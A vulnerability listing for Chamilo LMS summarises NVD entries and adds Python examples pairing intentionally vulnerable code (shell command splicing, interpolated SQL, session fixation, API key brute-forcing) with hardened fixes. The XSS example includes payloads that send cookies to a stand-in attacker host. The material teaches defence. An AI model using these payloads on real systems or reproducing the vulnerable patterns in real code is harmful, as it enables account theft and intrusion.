Chamilo Chamilo-Lms vulnerabilities
68 known vulnerabilities affecting chamilo/chamilo-lms.
Total CVEs: 68
CISA KEV: 0
Public exploits: 0
Exploited in wild: 0
Severity breakdown: CRITICAL 12, HIGH 31, MEDIUM 25
Vulnerabilities
Page 2 of 4
CVE-2025-50199 | P3 | CRITICAL | CVSS 9.1 | CWE-918 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is a blind SSRF vulnerability in /index.php via the POST openid_url parameter. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2025-50194 | P3 | HIGH | CVSS 7.2 | CWE-78 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /main/cron/lang/check_parse_lang.php. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2026-31939 | P3 | HIGH | CVSS 8.3 | CWE-22 | fixed in 1.11.38 | 2026-04-10
Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38.
Source: NVD
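The check the description says is missing, as an added Python example (not Chamilo's code): the unchecked concatenation beside a version that canonicalizes the path and refuses anything that resolves outside the intended directory. The directory layout, the `quiz1` name and the symlink are constructed for the demo; the real `test` parameter's naming rules are not shown on this page, so the basename rule is an assumption.

```python
import os
import tempfile
from typing import Optional


def unsafe_scores_path(base_dir: str, test: str) -> str:
    # The pre-1.11.38 shape described for CVE-2026-31939: the request value is
    # appended to the directory with no canonicalization or traversal check.
    return base_dir + "/" + test


def safe_scores_path(base_dir: str, test: str) -> Optional[str]:
    """Canonical path of `test` inside base_dir, or None if the value would
    resolve anywhere else (.., absolute paths, NUL bytes, symlinks out)."""
    # Assumed rule: a score file name is a single path component, never a dot name.
    if not test or "\x00" in test or test in (".", "..") or os.path.basename(test) != test:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, test))  # follows symlinks too
    if os.path.commonpath([base, candidate]) != base:
        return None  # escaped base_dir after canonicalization
    return candidate


def demo() -> dict:
    """Constructed layout: <tmp>/scores (intended directory) next to
    <tmp>/secret.txt (the file an attacker would like deleted)."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "scores")
        os.mkdir(base)
        secret = os.path.join(root, "secret.txt")
        open(secret, "w").close()
        os.symlink(secret, os.path.join(base, "link"))  # symlink inside the directory

        unsafe = os.path.realpath(unsafe_scores_path(base, "../secret.txt"))
        return {
            # the raw concatenation points straight at the sibling file
            "unsafe_reaches_secret": unsafe == os.path.realpath(secret),
            "traversal_blocked": safe_scores_path(base, "../secret.txt") is None,
            "absolute_blocked": safe_scores_path(base, secret) is None,
            # realpath() is what catches a symlink that leaves the directory
            "symlink_blocked": safe_scores_path(base, "link") is None,
            "plain_name_allowed": safe_scores_path(base, "quiz1")
            == os.path.join(os.path.realpath(base), "quiz1"),
        }
```

The basename check alone would accept `link`; the realpath-plus-commonpath check alone would accept a name that is merely odd. Keeping both is cheap, and the second one is the one that survives a later refactor of how the file name is built.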
CVE-2025-50196 | P3 | HIGH | CVSS 7.2 | CWE-78 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /plugin/vchamilo/views/editinstance.php via the POST main_database parameter. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2025-50195 | P3 | HIGH | CVSS 7.2 | CWE-78 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /plugin/vchamilo/views/manage.controller.php. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2025-50193 | P3 | HIGH | CVSS 7.2 | CWE-78 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /plugin/vchamilo/views/import.php via the POST to_main_database parameter. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2025-50197 | P3 | HIGH | CVSS 7.2 | CWE-78 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /main/admin/sub_language_ajax.inc.php via the POST new_language parameter. This issue has been patched in version 1.11.30.
Source: NVD
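The five CWE-78 entries above (check_parse_lang.php, the three vchamilo views and sub_language_ajax.inc.php) all share one shape: a request parameter such as main_database or to_main_database ends up inside a shell command line. The example below is added here and is not Chamilo's code; it uses `echo` as a stand-in for the real tool so it runs anywhere, and the database-name pattern is an assumption, since the page does not show the actual command.

```python
import re
import shlex
import subprocess

# Assumed naming rule for a MySQL database identifier (not taken from the vchamilo code).
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def valid_db_name(name: str) -> bool:
    return DB_NAME_RE.match(name) is not None


def run_vulnerable(database: str) -> str:
    # CWE-78 shape: the request value is spliced into a string handed to /bin/sh,
    # so ";" "|" "$(...)" and friends are interpreted as shell syntax.
    cmd = f"echo dumping {database}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(database: str) -> str:
    # If a shell really is unavoidable, shlex.quote() keeps the value one word.
    cmd = f"echo dumping {shlex.quote(database)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(database: str) -> str:
    # Preferred: allowlist the value, then pass an argv list with no shell at all.
    if not valid_db_name(database):
        raise ValueError(f"rejected database name: {database!r}")
    return subprocess.run(["echo", "dumping", database], capture_output=True, text=True).stdout
```

With the payload `main; echo INJECTED` the first function runs two commands, the quoted one prints the payload as a single literal argument, and the hardened one never reaches the process call. The allowlist is the part worth keeping even when the command is later rewritten to use a library instead of a subprocess.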
CVE-2025-55289 | P3 | CRITICAL | CVSS 9.0 | CWE-79 | fixed in 1.11.34 | 2026-03-06
Chamilo is a learning management system. Prior to version 1.11.34, a stored XSS vulnerability in Chamilo LMS (version 1.11.32) allows an attacker to inject arbitrary JavaScript into the platform's social network and internal messaging features. When viewed by an authenticated user (including administrators), the payload executes in their b
Source: NVD
CVE-2026-33710 | P3 | HIGH | CVSS 7.5 | CWE-330 | fixed in 1.11.38 | affected 2.x: >= 2.0.0-alpha.1, < 2.0.0-RC.3 | 2026-04-10
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key
Source: NVD
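An added Python reproduction of the formula quoted above (this is not Chamilo's code; PHP's md5() hashes the decimal string of the integer sum, which is what the reimplementation does). It shows what an attacker who knows the user id and an approximate creation time has to enumerate, and one property the description does not spell out: because only `time + 5 * user_id` feeds the hash, two users whose pairs sum to the same value get the same key. User id 42, the timestamp and the oracle are constructed; mapping a username to its numeric id is assumed to be possible.

```python
import hashlib
import secrets
from typing import Callable, Iterator, Optional


def weak_api_key(created_at: int, user_id: int) -> str:
    # PHP: md5(time() + ($user_id * 5) - rand(10000, 10000)); rand(10000, 10000)
    # is always 10000, so the only entropy is the second the key was made.
    return hashlib.md5(str(created_at + user_id * 5 - 10000).encode()).hexdigest()


def candidate_keys(user_id: int, approx_time: int, window: int) -> Iterator[str]:
    # Every key the formula can yield for this user within +/- window seconds.
    for t in range(approx_time - window, approx_time + window + 1):
        yield weak_api_key(t, user_id)


def brute_force_key(user_id: int, approx_time: int, window: int,
                    oracle: Callable[[str], bool]) -> Optional[str]:
    # `oracle` stands in for an API request that succeeds only with the right key.
    for key in candidate_keys(user_id, approx_time, window):
        if oracle(key):
            return key
    return None


def strong_api_key() -> str:
    # Replacement: 256 bits from the OS CSPRNG; nothing about the key is guessable.
    return secrets.token_hex(32)


# Constructed victim: user 42 generated a key at this (assumed) Unix time.
VICTIM_USER_ID = 42
VICTIM_KEY_TIME = 1_700_000_000
VICTIM_KEY = weak_api_key(VICTIM_KEY_TIME, VICTIM_USER_ID)


def demo_oracle(key: str) -> bool:
    return secrets.compare_digest(key, VICTIM_KEY)
```

A two-minute uncertainty about when the key was created costs 241 requests; a day costs 172,801. The 2.x and 1.11.38 fix moves to an unpredictable key, which is what `strong_api_key` shows; rotating existing keys after the upgrade matters as much as the new generator, since keys made by the old formula stay guessable.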
CVE-2025-50191 | P3 | HIGH | CVSS 7.2 | CWE-89 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, there is an error-based SQL Injection via the POST userFile parameter of /main/exercise/hotpotatoes.php. This issue has been patched in version 1.11.30.
Source: NVD
CVE-2026-33715 | P3 | HIGH | CVSS 7.2 | CWE-306 | affected: >= 2.0-RC.2, < 2.0-RC.3 | 2026-04-14
Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer
Source: NVD
CVE-2025-59542 | P3 | CRITICAL | CVSS 9.0 | CWE-79 | fixed in 1.11.34 | 2026-03-06
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the co
Source: NVD
CVE-2025-50188 | P3 | HIGH | CVSS 7.2 | CWE-89 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, the application performs insufficient validation of the user-supplied GET value parameter in the following scripts: /plugin/vchamilo/views/syncparams.php and /plugin/vchamilo/ajax/service.php, which allows an attacker to perform an attack aimed at modifying the databa
Source: NVD
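The two CWE-89 entries above (userFile in hotpotatoes.php and the vchamilo value parameter) are both values interpolated into SQL text. The example below is added here and is not Chamilo's code: it builds a constructed SQLite table whose columns are illustrative rather than Chamilo's schema, runs the interpolating query and the bound-parameter query against the same payloads, and shows the database error message an error-based attacker harvests when a malformed value reaches the parser.

```python
import sqlite3
from typing import Callable, List, Optional


def build_demo_db() -> sqlite3.Connection:
    # Constructed stand-in table; names are illustrative, not Chamilo's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hotpot_upload (id INTEGER PRIMARY KEY, filename TEXT)")
    conn.executemany(
        "INSERT INTO hotpot_upload (id, filename) VALUES (?, ?)",
        [(1, "quiz1.htm"), (2, "quiz2.htm"), (3, "final.htm")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_file: str) -> List[int]:
    # CWE-89 shape: the request value becomes part of the SQL text, so a quote
    # in it ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id FROM hotpot_upload WHERE filename = '{user_file}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn: sqlite3.Connection, user_file: str) -> List[int]:
    # The value travels as a bound parameter and can never alter the query's structure.
    sql = "SELECT id FROM hotpot_upload WHERE filename = ?"
    return [row[0] for row in conn.execute(sql, (user_file,))]


def error_text(lookup: Callable[[sqlite3.Connection, str], List[int]],
               conn: sqlite3.Connection, user_file: str) -> Optional[str]:
    # What an error-based attacker reads if the application echoes the DB error:
    # the parser's complaint about the broken query, None if nothing went wrong.
    try:
        lookup(conn, user_file)
        return None
    except sqlite3.Error as exc:
        return str(exc)
```

A single quote is enough to tell the two apart: the interpolating version raises a parser error that names the offending token, while the bound version simply finds no file called `'`. Suppressing the error page does not remove the injection, it only turns error-based into blind; the parameter binding is the fix.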
CVE-2025-59543 | P3 | CRITICAL | CVSS 9.0 | CWE-79 | fixed in 1.11.34 | 2026-03-06
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course description field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the course inform
Source: NVD
CVE-2026-31940 | P3 | HIGH | CVSS 8.8 | CWE-384 | fixed in 1.11.38 | affected 2.x: >= 2.0.0-alpha.1, < 2.0.0-RC.3 | 2026-04-10
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
Source: NVD
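How the fixation in aicc_hacp.php plays out, as an added Python model (not Chamilo's code, and not PHP's session machinery): a minimal server-side session table, a login that lets the request pick the session id the way `session_id($_REQUEST[...])` does, and a login that honours only server-issued ids and rotates the id at authentication. The attacker-chosen id and the user names are constructed.

```python
import secrets
from typing import Callable, Dict, Optional


class SessionStore:
    """Minimal server-side session table keyed by session id."""

    def __init__(self) -> None:
        self.sessions: Dict[str, dict] = {}

    def new(self) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {}
        return sid


def login_vulnerable(store: SessionStore, requested_sid: Optional[str], user: str) -> str:
    # Pre-fix shape: a request parameter chooses the session id before anything
    # else runs, so the id the attacker planted becomes the victim's session.
    sid = requested_sid or store.new()
    store.sessions.setdefault(sid, {})["user"] = user
    return sid


def login_hardened(store: SessionStore, presented_sid: Optional[str], user: str) -> str:
    # Unknown ids are ignored rather than adopted, and the id is rotated when the
    # privilege level changes, so nothing the attacker holds is ever authenticated.
    carried: dict = {}
    if presented_sid in store.sessions:
        carried = store.sessions.pop(presented_sid)
    new_sid = store.new()
    store.sessions[new_sid] = {**carried, "user": user}
    return new_sid


def fixation_succeeds(login: Callable[[SessionStore, Optional[str], str], str],
                      attacker_has_issued_id: bool) -> bool:
    """Attacker fixes a session id on the victim (e.g. via a crafted link), the
    victim logs in, then the attacker checks whether that id now carries the
    victim's login. Covers both an invented id and one the server issued to
    the attacker earlier."""
    store = SessionStore()
    attacker_sid = store.new() if attacker_has_issued_id else "attacker-chosen-id"
    login(store, attacker_sid, "victim")
    return store.sessions.get(attacker_sid, {}).get("user") == "victim"
```

The second scenario is the one a "reject unknown ids" fix on its own misses: an attacker can always obtain a genuine id by visiting the site, so regeneration at login is the part that actually closes the hole (PHP's `session_regenerate_id(true)` at authentication, and no code path that accepts an id from a GET or POST field).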
CVE-2026-34602 | P3 | HIGH | CVSS 7.1 | CWE-639 | fixed in 2.0.0-RC.3 | 2026-04-14
Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the /api/course_rel_users endpoint is vulnerable to Insecure Direct Object Reference (IDOR), allowing an authenticated attacker to modify the user parameter in the request body to enroll any arbitrary user into any course without proper authorization checks. The
Source: NVD
CVE-2025-52469 | P3 | HIGH | CVSS 7.1 | CWE-841 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, a logic vulnerability in the friend request workflow of Chamilo's social network module allows an authenticated user to forcibly add any user as a friend by directly calling the AJAX endpoint. The attacker can bypass the normal flow of sending and accepting friend requests, and even ad
Source: NVD
CVE-2026-31941 | P3 | MEDIUM | CVSS 6.5 | CWE-918 | fixed in 1.11.38 | affected 2.x: >= 2.0.0-alpha.1, < 2.0.0-RC.3 | 2026-04-10
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL with
Source: NVD
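Both SSRF entries on this page (the openid_url parameter in /index.php and the social_wall_new_msg_main parameter above) come down to fetching a user-supplied URL from the server. The check below is an added Python example, not Chamilo's code: it restricts the scheme, rejects embedded credentials, resolves the host, and refuses any address that is not publicly routable, including loopback, link-local (the 169.254.169.254 cloud metadata address) and IPv4-mapped IPv6 forms. The DNS table and its addresses are constructed.

```python
import ipaddress
import socket
from typing import Callable, List, Tuple, Union
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def system_resolve(host: str) -> List[str]:
    # Real DNS lookup; the demo swaps in a fixed table so it runs offline.
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def is_public(addr: Address) -> bool:
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still link-local
    return addr.is_global and not (
        addr.is_private or addr.is_loopback or addr.is_link_local
        or addr.is_multicast or addr.is_reserved or addr.is_unspecified
    )


def check_outbound_url(url: str,
                       resolve: Callable[[str], List[str]] = system_resolve) -> Tuple[bool, str]:
    """(True, resolved addresses) if the server may fetch `url`, else (False, reason)."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if not p.hostname:
        return False, "no host"
    if p.username or p.password:
        return False, "userinfo not allowed"
    try:
        addrs: List[Address] = [ipaddress.ip_address(p.hostname)]  # literal, incl. [::1]
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(p.hostname)]
        except (OSError, ValueError, KeyError):
            return False, "unresolvable host"
    if not addrs:
        return False, "no addresses"
    for a in addrs:
        if not is_public(a):
            return False, f"{p.hostname} resolves to non-public {a}"
    return True, ",".join(map(str, addrs))


# Constructed DNS table for the demo (8.8.8.8 is only a stand-in public address).
DEMO_DNS = {
    "lms.example": ["8.8.8.8"],
    "metadata.internal": ["169.254.169.254"],
    "intranet.example": ["10.0.0.5"],
}


def demo_resolve(host: str) -> List[str]:
    return DEMO_DNS[host]
```

Two caveats that matter for an endpoint that, as the description says, makes two requests: the client must connect to the address that was checked (resolve once, pin it, or re-check inside the client's connection hook), otherwise a DNS answer that changes between check and fetch slips through; and redirects must be disabled or re-validated per hop, otherwise a public host can bounce the server to an internal one.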
CVE-2026-33706 | P3 | HIGH | CVSS 7.1 | CWE-269 | fixed in 1.11.38 | 2026-04-10
Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.
Source: NVD
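The status escalation above and the /api/course_rel_users IDOR earlier on this page are the same class of bug seen from two sides: a field in the request body (status, user) is trusted without asking whether the caller may set it. The example below is added here and is not Chamilo's code. It models both endpoints with a field allowlist for self-service updates and an object-level check for enrollments; the status values 1 and 5 are the ones quoted in the description, while the editable-field set, the `is_admin` flag and the "course teachers may enroll others" rule are assumptions.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Set, Tuple

STATUS_TEACHER = 1  # Teacher/CourseManager, as quoted in the advisory text
STATUS_STUDENT = 5


@dataclass
class User:
    id: int
    username: str
    status: int
    is_admin: bool = False


# Assumed: the only profile fields an ordinary user may change on their own account.
SELF_EDITABLE = {"firstname", "lastname", "email"}


def update_user_vulnerable(users: Dict[str, User], caller: User, username: str, changes: dict) -> None:
    target = users[username]
    for field, value in changes.items():  # every supplied field is written, status included
        setattr(target, field, value)


def update_user_hardened(users: Dict[str, User], caller: User, username: str, changes: dict) -> None:
    target = users[username]
    if not caller.is_admin:
        if target.id != caller.id:
            raise PermissionError("may only update own account")
        disallowed = set(changes) - SELF_EDITABLE
        if disallowed:  # status, and anything else privilege-bearing, never passes here
            raise PermissionError(f"fields not self-editable: {sorted(disallowed)}")
    for field, value in changes.items():
        setattr(target, field, value)


def enroll_vulnerable(enrollments: Set[Tuple[str, int]], caller: User, course: str, user_id: int) -> None:
    enrollments.add((course, user_id))  # the body's user id is taken at face value


def enroll_hardened(enrollments: Set[Tuple[str, int]], caller: User, course: str, user_id: int,
                    course_teachers: Dict[str, Set[int]]) -> None:
    # Assumed rule: self-enrollment is fine; enrolling someone else needs a teaching
    # role on that course or admin rights. The check is per object, not per endpoint.
    if user_id != caller.id and not caller.is_admin \
            and caller.id not in course_teachers.get(course, set()):
        raise PermissionError("not allowed to enroll other users in this course")
    enrollments.add((course, user_id))


def allowed(action: Callable, *args) -> bool:
    """True if the action completes, False if authorization refused it."""
    try:
        action(*args)
        return True
    except PermissionError:
        return False


def make_demo() -> Tuple[Dict[str, User], Dict[str, Set[int]]]:
    # Constructed accounts: alice teaches CRYPTO101, bob and eve are students.
    users = {
        "alice": User(1, "alice", STATUS_TEACHER),
        "bob": User(2, "bob", STATUS_STUDENT),
        "eve": User(3, "eve", STATUS_STUDENT),
    }
    return users, {"CRYPTO101": {1}}
```

The allowlist is deliberately a list of what may be set rather than a list of what may not: a denylist of `status` would be silently bypassed the next time a privilege-bearing column is added to the user table.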
CVE-2025-52482 | P3 | HIGH | CVSS 8.3 | CWE-79 | fixed in 1.11.30 | 2026-03-02
Chamilo is a learning management system. Prior to version 1.11.30, a Stored XSS vulnerability exists in the glossary function, enabling all users with the Teachers role to inject JavaScript malicious code against the administrator. This issue has been patched in version 1.11.30.
Source: NVD
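The four stored XSS entries on this page (social network and messaging, learning path settings, course description, glossary) all store a field written by a low-privileged account and later render it to other users, administrators included. The example below is added here and is not Chamilo's code: it renders a stored field three ways (raw, with `<script>` blocks stripped, and HTML-escaped) and uses an HTML parser to count which constructed payloads still reach the browser as executable content. The payloads and the `attacker.example` host are constructed.

```python
import html
import re
from html.parser import HTMLParser
from typing import Callable, List


def render_vulnerable(description: str) -> str:
    # Stored field echoed into the page as-is: whatever was saved runs for every viewer.
    return description


def render_blacklist(description: str) -> str:
    # A tempting but insufficient fix: drop <script>...</script> and keep the rest.
    return re.sub(r"(?is)<script.*?</script>", "", description)


def render_escaped(description: str) -> str:
    # Correct for text placed in an HTML element body or a quoted attribute:
    # every markup metacharacter becomes an entity, so nothing is parsed as a tag.
    return html.escape(description, quote=True)


class _ActiveContentFinder(HTMLParser):
    """Records script-capable constructs a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(tag)
        for name, value in attrs:
            is_handler = name.startswith("on")
            is_js_url = name in ("href", "src") and (value or "").strip().lower().startswith("javascript:")
            if is_handler or is_js_url:
                self.findings.append(f"{tag}@{name}")


def active_content(markup: str) -> List[str]:
    finder = _ActiveContentFinder()
    finder.feed(markup)
    return finder.findings


# Constructed payloads a trainer could save into a description or glossary entry.
PAYLOADS = [
    "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
    "<a href=\"javascript:alert(document.domain)\">syllabus</a>",
]


def survivors(render: Callable[[str], str]) -> int:
    """How many payloads still carry executable content after rendering."""
    return sum(1 for p in PAYLOADS if active_content(render(p)))
```

Escaping is the answer only for the HTML text and attribute contexts; a value dropped into a script block or a URL needs that context's own encoding. Where rich text must be allowed (course descriptions usually must), an allowlist sanitizer applied at render time is the replacement, not a longer denylist.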